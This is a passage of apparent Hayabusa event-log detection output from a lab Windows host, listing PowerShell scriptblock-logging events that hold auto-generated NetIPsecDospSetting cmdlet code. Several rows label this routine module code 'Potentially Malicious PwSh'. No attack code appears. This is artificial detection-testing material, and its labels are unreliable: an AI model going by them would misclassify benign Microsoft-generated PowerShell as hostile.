[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"letization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecDospSetting' -Alias '*' function Get-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecDospSetting' -Alias '*' function Set-NetIPsecDospSetting { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${StateIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${PerIPRateLimitQueueIdleTimeoutSeconds}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [uint32] ${IpV6IPsecUnauthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IpV6IPsecAuthDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6IPsecAuthRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${IcmpV6Dscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IcmpV6RateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${IpV6FilterExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint16] ${DefBlockExemptDscp}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${DefBlockExemptRateLimitBytesPerSec}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxStateEntries}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxPerIPRateLimitQueues}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules] ${EnabledKeyingModules}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags] ${FilteringFlags}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PublicInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [WildcardPattern[]] ${PrivateInterfaceAliases}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PublicV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${PrivateV6Address}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetNa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name 
= 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value 
= $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) 
{ [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterEx",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.779 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"me='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
